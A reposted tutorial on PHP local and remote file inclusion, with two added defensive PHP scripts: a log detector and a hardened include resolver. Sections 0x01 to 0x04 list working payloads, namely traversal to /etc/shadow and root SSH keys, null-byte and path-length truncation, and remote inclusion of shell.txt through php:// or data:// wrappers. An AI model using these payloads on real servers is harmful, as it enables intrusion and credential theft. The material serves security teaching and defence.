PHP file inclusion vulnerability summary

Source: Internet
Author: User

0x00 Preface

A PHP file inclusion vulnerability arises when a PHP function pulls in a file whose name comes from user input without proper validation, so the function ends up operating on a file the developer never intended. The consequences range from unintended file disclosure to injection of malicious code.

The most common is the local file inclusion vulnerability.

Let's look at the following section of index.php code:

    if ($_GET['func']) {
        include $_GET['func'];
    } else {
        include 'default.php';
    }

The program's intent is probably that a request to http://example.com/index.php?func=add.php pulls in the styles and functionality from add.php, while a request to http://example.com/index.php on its own includes default.php.

The problem appears when we submit http://example.com/index.php?func=upload/pic/evil.jpg, where evil.jpg is an image an attacker has uploaded to the server with malicious PHP code appended to its end: that code is pulled into the current file and executed.

If the included file contains no valid PHP code, its contents are simply output as-is.

The rest of this article uses code samples to walk through a range of unusual and tricky exploitation techniques.

0x01 Common local file inclusion

    <?php include("inc/" . $_GET['file']); ?>

    • Include a file in the same directory:
      ?file=.htaccess
    • Directory traversal:
      ?file=../../../../../../../../var/lib/locate.db
      ?file=../../../../../../../../var/lib/mlocate/mlocate.db
      (On Linux these two files store the paths of every file on the system and require root access.)
    • Include the error log:
      ?file=../../../../../../../../var/log/apache/error.log
      (Try setting the User-Agent to "" so that the payload lands in the log.)
    • Read the web root or other configuration files:
      ?file=../../../../../../../../usr/local/apache2/conf/httpd.conf
      (More locations: http://wiki.apache.org/httpd/distrosdefaultlayout)
    • Include an uploaded attachment:
      ?file=../attachment/media/xxx.file
    • Read the session file:
      ?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7
      (The session file usually lives under /tmp and is named sess_[your PHPSESSID value]; sometimes it is under /var/lib/php5 or similar, so it is best to read the configuration file first. In some situations, if you can control the contents of the session, you may be able to obtain a shell.)
    • With root privileges you can also try reading these files:
      /root/.ssh/authorized_keys
      /root/.ssh/id_rsa
      /root/.ssh/id_rsa.keystore
      /root/.ssh/id_rsa.pub
      /root/.ssh/known_hosts
      /etc/shadow
      /root/.bash_history
      /root/.mysql_history
      /proc/self/fd/fd[0-9]* (file descriptors)
      /proc/mounts
      /proc/config.gz
    • If phpinfo() is available, you can include temporary upload files:
      See http://hi.baidu.com/mmnwzsdvpkjovwr/item/3f7ceb39965145eea984284el

0x02 Restricted local file inclusion

    <?php include("inc/" . $_GET['file'] . ".htm"); ?>

    • %00 truncation:
      ?file=../../../../../../../../etc/passwd%00
      (Requires magic_quotes_gpc=off; works on PHP older than 5.3.4.)
    • %00 truncation with directory traversal:
      ?file=../../../../../../../../var/www/%00
      (Requires magic_quotes_gpc=off and a Unix file system such as FreeBSD, OpenBSD, NetBSD or Solaris.)
    • Path length truncation:
      ?file=../../../../../../../../etc/passwd/././././././. [...] /./././././.
      (Works on PHP older than 5.2.8 (?); on Linux the file name must be longer than 4096 bytes, on Windows longer than 256.)
    • Dot truncation:
      ?file=../../../../../../../../boot.ini/..... [...] ............
      (Works on PHP older than 5.2.8 (?); Windows only, and the run of dots must be longer than 256 characters.)
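
As an added example (not from the original article), the following PHP script flags access-log requests whose file parameter shows the local-inclusion shapes listed in 0x01 and 0x02: directory traversal, %00 truncation, reads of sensitive system paths, and the path-length and dot padding tricks. The log lines and the rule names in LFI_RULES are constructed for this demo.

```php
<?php
// Added example, not the article's code: flag access-log requests whose
// query string shows the local-inclusion shapes described above. The log
// lines below are constructed; the format is Apache "combined".
declare(strict_types=1);

// Rule name => regex applied to the URL-decoded query string.
const LFI_RULES = [
    'directory traversal'  => '#(^|[/\\\\])\.\.([/\\\\]|$)#',
    'null-byte truncation' => '/\x00/',                    // %00 after decoding
    'sensitive file path'  => '#/etc/(passwd|shadow)|/proc/|/var/log/|/tmp/sess_|/root/\.#',
    'path-length padding'  => '#(?:/\.){50,}|\.{200,}#',   // "/././." or "....." runs
];

// Returns the matching rule names, or null when the line looks benign or
// carries no query string at all.
function classify_request(string $logLine): ?array
{
    // Pull the target out of "GET /path?query HTTP/1.1".
    if (!preg_match('#"[A-Z]+ (\S+) HTTP/[\d.]+"#', $logLine, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;
    }
    $decoded = rawurldecode($query);   // also turns %00 into a real NUL byte
    $hits = [];
    foreach (LFI_RULES as $name => $re) {
        if (preg_match($re, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits === [] ? null : $hits;
}

// Constructed sample lines (placeholder IPs; the first request is benign).
$sample = [
    '203.0.113.5 - - [10/Oct/2000:13:55:36 +0000] "GET /index.php?file=add HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2000:13:55:40 +0000] "GET /index.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 1840 "-" "-"',
    '203.0.113.7 - - [10/Oct/2000:13:56:02 +0000] "GET /index.php?file=../../../../tmp/sess_abc123 HTTP/1.1" 200 90 "-" "curl/7.0"',
];
foreach ($sample as $line) {
    $hits = classify_request($line);
    echo ($hits === null ? 'ok      ' : 'SUSPECT '), $line, PHP_EOL;
    if ($hits !== null) {
        echo '        reasons: ', implode(', ', $hits), PHP_EOL;
    }
}
```

Feeding a real log through classify_request() line by line gives a first-pass triage list; tune the sensitive-path rule to the paths that actually exist on the host being protected.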

0x03 Common remote file inclusion

    <?php include($_GET['file']); ?>

    • Remote code execution:
      ?file=[http|https|ftp]://example.com/shell.txt
      (Requires allow_url_fopen=on and allow_url_include=on.)
    • Using the php://input stream:
      ?file=php://input
      (Requires allow_url_include=on; details: http://php.net/manual/en/wrappers.php.php)
    • Using the PHP stream filter:
      ?file=php://filter/convert.base64-encode/resource=index.php
      (Same requirements as above.)
    • Using a data URI:
      ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
      (Requires allow_url_include=on.)
    • Executing arbitrary code via XSS:
      ?file=http://127.0.0.1/path/xss.php?xss=phpcode
      (Requires allow_url_fopen=on and allow_url_include=on, in a setup where a firewall or whitelist blocks access to external hosts: first find an XSS vulnerability on the same site, then include that page to inject the malicious code. The conditions are extreme and rarely met.)

0x04 Restricted remote file inclusion

    <?php include($_GET['file'] . ".htm"); ?>

    • ?file=http://example.com/shell
    • ?file=http://example.com/shell.txt?
    • ?file=http://example.com/shell.txt%23
      (Require allow_url_fopen=on and allow_url_include=on.)
    • ?file=\\evilshare\shell.php (only needs allow_url_include=on)
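
As an added example (not the article's code) serving sections 0x01 through 0x04, here is a hardened replacement for the include("inc/" . $_GET['file'] . ".htm") pattern: a shape check that refuses path separators, dots, NUL bytes and stream wrappers, an allowlist of page names, and a realpath() confinement check. The inc/ directory and the names in ALLOWED_PAGES are assumptions made for the demo.

```php
<?php
// Added example, not the article's code: a hardened replacement for the
//   include("inc/" . $_GET['file'] . ".htm");
// pattern in 0x02 and 0x04. The inc/ directory and the names in
// ALLOWED_PAGES are assumptions made for this demo.
declare(strict_types=1);
const INC_DIR = __DIR__ . '/inc';
const ALLOWED_PAGES = ['default', 'add', 'list'];

// Returns the absolute file to include, or null when the value is rejected.
function resolve_page(string $file): ?string
{
    // 1. Shape check: a bare page name only. This refuses "/", "\", ".",
    //    NUL bytes and any "scheme:" prefix, so traversal, %00 truncation,
    //    UNC paths and php://, data://, http:// wrappers never reach include().
    if (preg_match('/\A[a-z0-9_-]{1,32}\z/', $file) !== 1) {
        return null;
    }
    // 2. Allowlist: only names the application actually knows about.
    if (!in_array($file, ALLOWED_PAGES, true)) {
        return null;
    }
    // 3. Defence in depth: resolve symlinks and confirm the result is still
    //    inside INC_DIR. realpath() returns false for a missing file.
    $base = realpath(INC_DIR);
    $real = realpath(INC_DIR . '/' . $file . '.htm');
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// In index.php, never hand the raw parameter to include():
//   $page = resolve_page((string)($_GET['file'] ?? 'default'));
//   if ($page === null) { http_response_code(400); exit; }
//   include $page;

// Demo with constructed values modelled on the article's payload shapes.
// 'add' is accepted only once inc/add.htm exists next to this script.
$probes = [
    'add',
    "../../../../etc/passwd\0",
    'php://filter/convert.base64-encode/resource=index.php',
    'http://example.com/shell.txt?',
    '\\\\evilshare\\shell.php',
];
foreach ($probes as $p) {
    printf("%-56s => %s\n", addcslashes($p, "\0"), resolve_page($p) ?? 'rejected');
}
```

Pair the code change with allow_url_include=Off in php.ini so that a future regression in the validation still cannot turn into remote inclusion.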

0x05 Extension

As noted at the start, the root cause is that a PHP function pulls in a file whose name comes from user input without proper validation, so it ends up operating on a file the developer never intended. include() is not the only function that operates on files; some of the truncation tricks described above also apply to the following functions:

Reference articles:

http://websec.wordpress.com/2009/11/28/freebsd-directory-listing-with-php-file-functions/
http://www.digininja.org/blog/when_all_you_can_do_is_read.php
http://wiki.apache.org/httpd/DistrosDefaultLayout
http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/
http://www.coresec.org/2011/05/12/local-file-inclusion-to-remote-command-execution-using-ssh/
http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/
